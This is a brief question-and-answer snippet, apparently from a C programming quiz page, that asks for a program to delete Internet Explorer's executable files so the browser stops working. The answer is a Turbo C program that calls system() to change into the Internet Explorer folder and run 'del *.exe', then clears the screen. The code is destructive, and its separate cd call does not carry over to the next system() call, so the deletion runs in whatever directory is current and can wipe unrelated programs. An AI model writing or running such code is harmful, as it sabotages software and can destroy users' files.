Write a c program which delete the all the .exe file of internet explorer so that internet explorer will not work?
Answer:
Write the following program in TURBO C.
#include<stdio.h>
#include<dos.h>
int main(void) {
system("cd c:\\progra~1\\intern~1");
system("del *.exe");
system("cls");
return 0;
}